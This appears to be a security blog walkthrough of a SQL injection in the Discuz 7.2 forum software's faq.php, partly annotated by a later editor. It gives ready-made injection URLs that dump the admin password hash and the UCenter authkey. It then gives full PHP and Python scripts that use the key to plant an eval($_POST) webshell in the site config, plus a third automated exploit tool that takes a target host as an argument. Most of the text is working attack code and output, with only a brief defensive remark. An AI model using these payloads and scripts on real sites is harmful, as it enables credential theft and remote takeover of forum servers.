A study of Discuz 7.2 faq.php SQL injection

Source: Internet
Author: User

On 6.2 (possibly earlier) I saw this exp online; it is a SQL injection vulnerability in Discuz 7.2.

After checking a lot of them, most of the exploits circulating online have one problem or another, so I tested and revised them; the method I ended up using is summarized below:

Discuz 7.2/faq.php SQL Injection Vulnerability


1. Get Database version information
faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
This is the classic error-based double query: grouping on concat(<data>,floor(rand(0)*2)) makes MySQL hit a duplicate group key, and the error message echoes the data back.

2. Get the Administrator account password

faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat((select (select (select concat(username,0x27,password) from cdb_members limit 1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
Strip the trailing 1 from the returned value: it is the floor(rand(0)*2) part of the group key, not part of the hash.


Such as:
http://xxxxx/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20(select%20(select%20concat(username,0x27,password)%20from%20cdb_members%20limit%201))%20from%20`information_schema`.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
Return:
Error: Duplicate entry 'admin'f426eaa50a5c805d360ca4046419c6ba1' for key 'group_key'
The password hash is f426eaa50a5c805d360ca4046419c6ba (the trailing 1 is the rand marker).



3. Get key

faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,1,62) from cdb_uc_applications limit 0,1),0x3a)x from information_schema.tables group by x)a)%23


faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,63,64) from cdb_uc_applications limit 0,1),0x3a)x from information_schema.tables group by x)a)%23
Note:
The value MySQL shows in a Duplicate entry error is cut off at 64 characters. With the "1:" marker in front of it, only 62 characters of the 64-character authkey fit in one response, and the injected query cannot simply be reshaped to avoid this (the modified versions I tried no longer dumped data). So the key is read in two requests: the first 62 characters, then the remaining 2.


Such as
http://xxxxx/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x3a,(select%20substr(authkey,1,62)%20from%20cdb_uc_applications%20limit%200,1),0x3a)x%20from%20information_schema.tables%20group%20by%20x)a)%23
Return:
Error: Duplicate entry '1:c7e2fa170467q8sbx4ud77masbr0w7v7acg9q9b4i1lezat8i0d9ebj5p6q2se' for key 'group_key'


http://xxxx/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x3a,(select%20substr(authkey,63,64)%20from%20cdb_uc_applications%20limit%200,1),0x3a)x%20from%20information_schema.tables%20group%20by%20x)a)%23
Return:
Error: Duplicate entry '1:o6:' for key 'group_key'
This time the closing 0x3a separator is visible because the value is short enough not to be truncated. The full key is "c7e2fa170467q8sbx4ud77masbr0w7v7acg9q9b4i1lezat8i0d9ebj5p6q2se" + "o6" = c7e2fa170467q8sbx4ud77masbr0w7v7acg9q9b4i1lezat8i0d9ebj5p6q2seo6 (64 characters).
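As an added example (my code, not from the original post, and in Python 3 rather than the PHP of the exploits), the block below makes the mechanics of steps 1 to 3 concrete. It rebuilds the SQL that the grouppermission branch of faq.php assembles from the two gids parameters, on the assumption (not shown on this page) that the code addslashes() every GET value and then takes $row[0] of each element: for the string gids[99]="'" that is the backslash of the escaped quote, and that backslash is what lets gids[100][0] land outside the quoted id list. It then parses the MySQL Duplicate entry errors quoted above to recover the username and hash and the two authkey halves. The table prefix, the payloads and the error strings are taken from this page; the query shape is my reconstruction.

```python
import re

# Sample inputs taken from the walkthrough above: the two gids values of step 1 and the
# three Duplicate entry errors quoted in steps 2 and 3.
GIDS_STEP1 = {
    99: "'",
    100: [") and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x"
          " from information_schema.tables group by x)a)#"],
}
ERR_PASSWORD = "Error:Duplicate entry 'admin'f426eaa50a5c805d360ca4046419c6ba1' for key 'group_key'"
ERR_KEY_1 = ("Error:Duplicate entry "
             "'1:c7e2fa170467q8sbx4ud77masbr0w7v7acg9q9b4i1lezat8i0d9ebj5p6q2se' for key 'group_key'")
ERR_KEY_2 = "Error:Duplicate entry '1:o6:' for key 'group_key'"


def addslashes(s):
    """PHP addslashes(): backslash-escape ' " \\ and NUL, as Discuz 7.2 does to every GET value."""
    return re.sub(r"([\\'\"\x00])", r"\\\1", s)


def implodeids(ids):
    """Discuz implodeids(): quote every id and join them with commas."""
    return "'" + "','".join(ids) + "'"


def build_group_query(gids, prefix="cdb_"):
    """Reconstruction (assumption, not shown on the page) of the query the grouppermission
    branch runs. Each $gids element is addslashes()'d and then indexed with $row[0]: for an
    array that is element 0, for a string it is the FIRST CHARACTER, so gids[99]="'"
    (escaped to \\') contributes a lone backslash."""
    groupids = []
    for row in gids.values():
        if isinstance(row, list):
            groupids.append(addslashes(row[0]))
        else:
            groupids.append(addslashes(row)[0])
    return ("SELECT * FROM %susergroups u LEFT JOIN %sadmingroups a ON u.groupid=a.admingid"
            " WHERE u.groupid IN (%s)" % (prefix, prefix, implodeids(groupids)))


def unquoted_sql(sql):
    """Return the chunks of a statement that lie OUTSIDE single-quoted literals, honouring
    MySQL backslash escapes. The backslash from gids[99] turns the quote that should close the
    first id into an escaped quote, so the first literal becomes the two characters ', and the
    whole second element lands unquoted: that is the last chunk returned here."""
    chunks, buf, in_str, i = [], "", False, 0
    while i < len(sql):
        c = sql[i]
        if in_str:
            if c == "\\":
                i += 1          # skip the escaped character; still inside the literal
            elif c == "'":
                in_str = False
        elif c == "'":
            in_str = True
            if buf:
                chunks.append(buf)
                buf = ""
        else:
            buf += c
        i += 1
    if buf:
        chunks.append(buf)
    return chunks


DUP_ENTRY = re.compile(r"Duplicate entry '(.*)' for key '")


def duplicate_entry(error_text):
    """Pull the leaked value out of MySQL's error. MySQL truncates it to 64 characters,
    which is why the 64-character authkey has to be read in two pieces."""
    m = DUP_ENTRY.search(error_text)
    if not m:
        raise ValueError("no Duplicate entry error in the response")
    return m.group(1)


def recover_credentials(error_text):
    """Step 2 layout: concat(username,0x27,password) with floor(rand(0)*2) appended.
    Split on the 0x27 quote and drop the trailing 0/1 marker."""
    user, _, rest = duplicate_entry(error_text).partition("'")
    return user, rest[:-1]


def recover_authkey(*error_texts):
    """Step 3 layout: concat(floor(rand(0)*2),0x3a,<piece>,0x3a). Drop the 'N:' marker and
    the closing ':' (present only when the value was not truncated), then join the pieces."""
    pieces = []
    for text in error_texts:
        _, _, piece = duplicate_entry(text).partition(":")
        pieces.append(piece[:-1] if piece.endswith(":") else piece)
    key = "".join(pieces)
    if len(key) != 64:
        raise ValueError("expected a 64-character authkey, got %d" % len(key))
    return key


if __name__ == "__main__":
    print(build_group_query(GIDS_STEP1))
    print(unquoted_sql(build_group_query(GIDS_STEP1))[-1])
    print(recover_credentials(ERR_PASSWORD))
    print(recover_authkey(ERR_KEY_1, ERR_KEY_2))
```

The same parsing applies to any payload that uses the floor(rand(0)*2) marker: put the marker in a known position (prefix or suffix, with a separator the data cannot contain) and strip it from the leaked value; remember the 64-character limit on what the error will show.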


After obtaining the hash and key I wanted to reuse the known uc_key getshell method, but the exploits I found are written for Discuz X2/X2.5/X3. Both versions use the same trick: with the key you can mint a valid code for api/uc.php?action=updateapps, which rewrites the define('UC_API', ...) line of the config file with a regex. The first request plants http://xxx');eval($_POST[dom]);// as UC_API (the server escapes the quote, so it lands as 'http://xxx\');eval($_POST[dom]);//', still inside the string); the second request makes the lazy regex replace only define('UC_API', 'http://xxx'); and leaves the eval behind as live code. There are two versions:

PHP version

<?php
// Code copyright belongs to the original author.
$timestamp = time() + 10 * 3600;
$host = "127.0.0.1";
$uc_key = "EAPF15K8B334BC8EBEY4GFN1VBQEA0N5WAOFQ6J285CA33I151E551G0L9F2L3DD";
$code = urlencode(_authcode("time=$timestamp&action=updateapps", 'ENCODE', $uc_key));

// First request plants the eval inside the UC_API string; the second request's regex replace leaves it outside the string.
$cmd1 = '<?xml version="1.0" encoding="ISO-8859-1"?><root> <item id="UC_API">http://xxx\');eval($_POST[dom]);//</item></root>';
$cmd2 = '<?xml version="1.0" encoding="ISO-8859-1"?><root> <item id="UC_API">http://aaa</item></root>';

$html1 = send($cmd1);
echo $html1;
$html2 = send($cmd2);
echo $html2;

function send($cmd) {
    global $host, $code;
    $message  = "POST /api/uc.php?code=" . $code . " HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: " . $host . "\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: " . $host . "\r\n";
    $message .= "Content-Length: " . strlen($cmd) . "\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $cmd;
    var_dump($message);
    $fp = fsockopen($host, 80);
    fputs($fp, $message);
    $resp = '';
    while ($fp && !feof($fp)) {
        $resp .= fread($fp, 1024);
    }
    return $resp;
}

// UCenter's authcode(): RC4 keyed from md5($key), with a 10-digit expiry and a 16-char md5 tag in front of the data.
function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
    $ckey_length = 4;
    $key = md5($key ? $key : UC_KEY);
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length) : substr(md5(microtime()), -$ckey_length)) : '';
    $cryptkey = $keya . md5($keya . $keyc);
    $key_length = strlen($cryptkey);
    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $keyb), 0, 16) . $string;
    $string_length = strlen($string);
    $result = '';
    $box = range(0, 255);
    $rndkey = array();
    for ($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }
    for ($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }
    for ($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }
    if ($operation == 'DECODE') {
        if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $keyb), 0, 16)) {
            return substr($result, 26);
        } else {
            return '';
        }
    } else {
        return $keyc . str_replace('=', '', base64_encode($result));
    }
}
?>

A Python version (Python 2; it uses urllib2):

#!/usr/bin/env python
# coding=utf-8
import hashlib
import time
import math
import base64
import urllib
import urllib2
import sys


def microtime(get_as_float=False):
    # Mimic PHP microtime(), used only to derive the 4-char keyc.
    if get_as_float:
        return time.time()
    else:
        return '%.8f %d' % math.modf(time.time())


def get_authcode(string, key=''):
    # ENCODE half of UCenter's authcode(): expiry field, md5 tag, data, then RC4 and base64.
    ckey_length = 4
    key = hashlib.md5(key).hexdigest()
    keya = hashlib.md5(key[0:16]).hexdigest()
    keyb = hashlib.md5(key[16:32]).hexdigest()
    keyc = (hashlib.md5(microtime()).hexdigest())[-ckey_length:]
    # keyc = (hashlib.md5('0.736000 1389448306').hexdigest())[-ckey_length:]
    cryptkey = keya + hashlib.md5(keya + keyc).hexdigest()
    key_length = len(cryptkey)
    string = '0000000000' + (hashlib.md5(string + keyb)).hexdigest()[0:16] + string
    string_length = len(string)
    result = ''
    box = range(0, 256)
    rndkey = dict()
    for i in range(0, 256):
        rndkey[i] = ord(cryptkey[i % key_length])
    j = 0
    for i in range(0, 256):
        j = (j + box[i] + rndkey[i]) % 256
        tmp = box[i]
        box[i] = box[j]
        box[j] = tmp
    a = 0
    j = 0
    for i in range(0, string_length):
        a = (a + 1) % 256
        j = (j + box[a]) % 256
        tmp = box[a]
        box[a] = box[j]
        box[j] = tmp
        result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256]))
    return keyc + base64.b64encode(result).replace('=', '')


def get_shell(url, key, host):
    '''Send the two updateapps requests to get a webshell'''
    headers = {
        'Accept-Language': 'zh-cn',
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)',
        'Referer': url,
    }
    tm = time.time() + 10 * 3600
    tm = "time=%d&action=updateapps" % tm
    code = urllib.quote(get_authcode(tm, key))
    url = url + "?code=" + code
    data1 = '''<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">http://xxx\');eval($_POST[1]);//</item>
</root>'''
    try:
        req = urllib2.Request(url, data=data1, headers=headers)
        ret = urllib2.urlopen(req)
    except:
        return "Access error"
    data2 = '''<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">http://aaa</item>
</root>'''
    try:
        req = urllib2.Request(url, data=data2, headers=headers)
        ret = urllib2.urlopen(req)
    except:
        return "error"
    return "Webshell: " + host + "/config/config_ucenter.php, password: 1"


if __name__ == '__main__':
    host = sys.argv[1]
    key = sys.argv[2]
    url = host + "/api/uc.php"
    print get_shell(url, key, host)

How to use (the host and the 64-character uc_key recovered in step 3 are separate arguments):

python uckey.py http://www.localhost.com <uc_key>

But it seems unable to take down 7.2: the getshell did not succeed and I do not know why, so I would ask you all for advice.
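Everything after the injection rests on UCenter's authcode(): whoever holds the 64-character uc_key can mint a code that api/uc.php will accept. The following is an added Python 3 port (my code, not the page's nor UCenter's own) with both ENCODE and DECODE, so the updateapps code the scripts above build can be checked offline: it decodes under the right key, while a wrong key, a tampered character or a stale expiry field all yield an empty result. The key value is the one recovered in step 3; the fixed keyc and clock exist only to make runs repeatable.

```python
import base64
import hashlib
import time
from urllib.parse import quote, unquote

# The key recovered in step 3 above (64 characters).
KEY = "c7e2fa170467q8sbx4ud77masbr0w7v7acg9q9b4i1lezat8i0d9ebj5p6q2seo6"


def _md5(data):
    return hashlib.md5(data).hexdigest()


def authcode(string, operation="DECODE", key="", expiry=0, keyc=None, now=None):
    """Port of UCenter's authcode(). Plaintext layout before RC4:
    10-digit expiry | 16 hex chars of md5(data + keyb) | data.
    The 4-char keyc is sent in clear and mixed into the RC4 key. `string` and the
    result are bytes; keyc/now are parameters here so runs are repeatable."""
    now = int(time.time()) if now is None else now
    ckey_length = 4
    key = _md5(key.encode())
    keya = _md5(key[:16].encode())
    keyb = _md5(key[16:32].encode())
    if operation == "DECODE":
        keyc = string[:ckey_length].decode("latin-1")
    elif keyc is None:
        keyc = _md5(str(time.time()).encode())[-ckey_length:]
    cryptkey = keya + _md5((keya + keyc).encode())
    key_length = len(cryptkey)

    if operation == "DECODE":
        body = string[ckey_length:]
        body = base64.b64decode(body + b"=" * (-len(body) % 4))  # PHP strips the '=' padding
    else:
        exp = "%010d" % (expiry + now if expiry else 0)
        body = exp.encode() + _md5(string + keyb.encode())[:16].encode() + string

    box = list(range(256))                       # RC4 key scheduling over the hex cryptkey
    rndkey = [ord(cryptkey[i % key_length]) for i in range(256)]
    j = 0
    for i in range(256):
        j = (j + box[i] + rndkey[i]) % 256
        box[i], box[j] = box[j], box[i]
    result = bytearray()                         # RC4 keystream XOR
    a = j = 0
    for ch in body:
        a = (a + 1) % 256
        j = (j + box[a]) % 256
        box[a], box[j] = box[j], box[a]
        result.append(ch ^ box[(box[a] + box[j]) % 256])

    if operation == "DECODE":
        head = bytes(result[:10])
        if not head.isdigit():                   # PHP compares loosely; strict digits here
            return b""
        tag_ok = result[10:26] == _md5(bytes(result[26:]) + keyb.encode())[:16].encode()
        if (int(head) == 0 or int(head) - now > 0) and tag_ok:
            return bytes(result[26:])
        return b""
    return keyc.encode() + base64.b64encode(bytes(result)).replace(b"=", b"")


def forge_updateapps_code(uc_key, now=None, keyc=None):
    """What the scripts above send as ?code=. uc.php rejects a code whose time is more
    than an hour in the past, which is why they put it ten hours ahead."""
    now = int(time.time()) if now is None else now
    payload = ("time=%d&action=updateapps" % (now + 10 * 3600)).encode()
    return quote(authcode(payload, "ENCODE", uc_key, keyc=keyc, now=now), safe="")


def verify_code(uc_key, code, now=None):
    """The server side: unquote and DECODE with the site's own key.
    Empty bytes means the tag or expiry check failed."""
    return authcode(unquote(code).encode("latin-1"), "DECODE", uc_key, now=now)


def demo(now=1700000000):
    """Forge a code and show what uc.php would accept or reject; returns the results."""
    code = forge_updateapps_code(KEY, now=now, keyc="ab12")
    raw = unquote(code).encode()
    i = 44  # a base64 char inside the encrypted query string: RC4 is a stream cipher, so one
    #         ciphertext change flips one plaintext byte and the md5 tag no longer matches
    tampered = raw[:i] + (b"A" if raw[i:i + 1] != b"A" else b"B") + raw[i + 1:]
    short = authcode(b"time=1&action=updateapps", "ENCODE", KEY, expiry=3600, keyc="ab12", now=now)
    return {
        "code": code,
        "valid": verify_code(KEY, code, now=now),
        "wrong_key": verify_code("not-the-site-key", code, now=now),
        "tampered": authcode(tampered, "DECODE", KEY, now=now),
        "fresh": authcode(short, "DECODE", KEY, now=now + 60),
        "expired": authcode(short, "DECODE", KEY, now=now + 7200),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

The design point for defenders: the md5 tag and expiry make the code unforgeable without the key, but they give no protection once the key has leaked through the SQL injection above, so rotating UC_KEY is part of cleaning up after this bug, not an optional extra.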


Finally, the attached "xiaoma" (Pony) exp, whose results are also not ideal: it goes roughly the same way as above, but seemingly cannot getshell either.

<?php
/**
 * @author: xiaoma
 * @blog:   www.i0day.com
 * @date:   2014.7.2 23:1
 */
error_reporting(0);
set_time_limit(3000);
$host = $argv[1];
$path = isset($argv[2]) ? rtrim($argv[2], '/') : '';
$js = $argv[3];
$timestamp = time() + 10 * 3600;
$table = "cdb_"; // table prefix

if ($argc < 4) {
    print_r('
********************************************************
*          Discuz faq.php SQL Injection EXP            *
*          ---------By:Www.i0day.com-----------        *
*  usage:  php ' . $argv[0] . ' host path option
*  option: 1. GetShell  2. Get password  3. Check table prefix
*  e.g.:   php ' . $argv[0] . ' www.i0day.com / 1
*          php ' . $argv[0] . ' www.i0day.com /dz72 1
********************************************************
');
    exit;
}

if ($js == 1) {
    // Read length(authkey) first, wrapped in :: markers, to confirm the table prefix.
    $sql = "action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x3a3a,(select%20length(authkey)%20from%20" . $table . "uc_applications%20limit%200,1),0x3a3a)x%20from%20information_schema.tables%20group%20by%20x)a)%23";
    $resp = sendpack($host, $path, $sql);
    if (strpos($resp, "::") === false) {
        echo 'The table prefix may not be the default cdb_; check the table prefix first!';
    } else {
        preg_match("/::(.*)::/", $resp, $matches);
        $lenght = intval($matches[1]);
        if ($lenght && $lenght <= 124) { // two reads of at most 62 characters each
            $sql = "action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5e,(select%20substr(authkey,1,62)%20from%20" . $table . "uc_applications%20limit%200,1))x%20from%20information_schema.tables%20group%20by%20x)a)%23";
            $resp = sendpack($host, $path, $sql);
            if (strpos($resp, "1^") !== false) {
                preg_match("/1\^(.*)'/U", $resp, $key1);
                $sql = "action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5e,(select%20substr(authkey,63,62)%20from%20" . $table . "uc_applications%20limit%200,1))x%20from%20information_schema.tables%20group%20by%20x)a)%23";
                $resp = sendpack($host, $path, $sql);
                preg_match("/1\^(.*)'/U", $resp, $key2);
                $key = $key1[1] . $key2[1];
                $code = urlencode(_authcode("time=$timestamp&action=updateapps", 'ENCODE', $key));
                $cmd1 = '<?xml version="1.0" encoding="ISO-8859-1"?><root> <item id="UC_API">bbs.49you.com\');eval($_POST[i0day]);//</item></root>';
                $cmd2 = '<?xml version="1.0" encoding="ISO-8859-1"?><root> <item id="UC_API">bbs.49you.com</item></root>';
                $html1 = send($cmd1);
                $res1 = substr($html1, -1);
                $html2 = send($cmd2);
                $res2 = substr($html2, -1);
                if ($res1 == '1' && $res2 == '1') {
                    echo 'Shell address: http://' . $host . $path . '/config.inc.php  pass: i0day';
                }
            } else {
                echo 'Get failed';
            }
        }
    }
} elseif ($js == 2) {
    $sql = "action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%280x5e5e5e,username,0x3a,password,0x3a,salt%29%20from%20" . $table . "uc_members%20limit%200,1%29,floor%28rand%280%29*2%29,0x5e%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23";
    $resp = sendpack($host, $path, $sql);
    if (strpos($resp, "^^^") !== false) {
        preg_match("/\^\^\^(.*)\^/U", $resp, $password);
        // The last character is the floor(rand(0)*2) marker, not part of the salt.
        echo 'Password: ' . substr($password[1], 0, -1);
    } else {
        echo 'The table prefix may not be the default cdb_; check the table prefix first!';
    }
} elseif ($js == 3) {
    $sql = "action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5e,(select%20hex(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1),0x5e)x%20from%20information_schema.tables%20group%20by%20x)a)%23";
    $resp = sendpack($host, $path, $sql);
    if (strpos($resp, "1^") !== false) {
        preg_match("/1\^(.*)\^/U", $resp, $t);
        $name = hex2str($t[1]);
        if (strpos($name, "cdb_") !== false) {
            echo "Table name: " . $name . " ; the prefix is the default cdb_, no change needed";
        } else {
            echo "Table name: " . $name . " is not the default cdb_ prefix; edit \$table in this script";
        }
    } else {
        echo "Could not read the table prefix, sorry";
    }
} else {
    echo "No option selected";
}

function sendpack($host, $path, $sql) {
    $data  = "GET " . $path . "/faq.php?" . $sql . " HTTP/1.1\r\n";
    $data .= "Host: " . $host . "\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0\r\n";
    $data .= "Connection: Close\r\n\r\n";
    $ock = fsockopen($host, 80);
    if (!$ock) {
        echo "No response from " . $host;
        die();
    }
    fwrite($ock, $data);
    $resp = '';
    while (!feof($ock)) {
        $resp .= fread($ock, 1024);
    }
    return $resp;
}

function send($cmd) {
    global $host, $code, $path;
    $message  = "POST " . $path . "/api/uc.php?code=" . $code . " HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: " . $host . "\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: " . $host . "\r\n";
    $message .= "Content-Length: " . strlen($cmd) . "\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $cmd;
    var_dump($message);
    $fp = fsockopen($host, 80);
    fputs($fp, $message);
    $resp = '';
    while ($fp && !feof($fp)) {
        $resp .= fread($fp, 1024);
    }
    return $resp;
}

// UCenter's authcode(): RC4 keyed from md5($key), with a 10-digit expiry and a 16-char md5 tag in front of the data.
function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
    $ckey_length = 4;
    $key = md5($key ? $key : UC_KEY);
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length) : substr(md5(microtime()), -$ckey_length)) : '';
    $cryptkey = $keya . md5($keya . $keyc);
    $key_length = strlen($cryptkey);
    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $keyb), 0, 16) . $string;
    $string_length = strlen($string);
    $result = '';
    $box = range(0, 255);
    $rndkey = array();
    for ($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }
    for ($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }
    for ($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }
    if ($operation == 'DECODE') {
        if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $keyb), 0, 16)) {
            return substr($result, 26);
        } else {
            return '';
        }
    } else {
        return $keyc . str_replace('=', '', base64_encode($result));
    }
}

function hex2str($hex) {
    $str = '';
    foreach (str_split($hex, 2) as $bit) {
        $str .= chr(hexdec($bit));
    }
    return $str;
}
?>


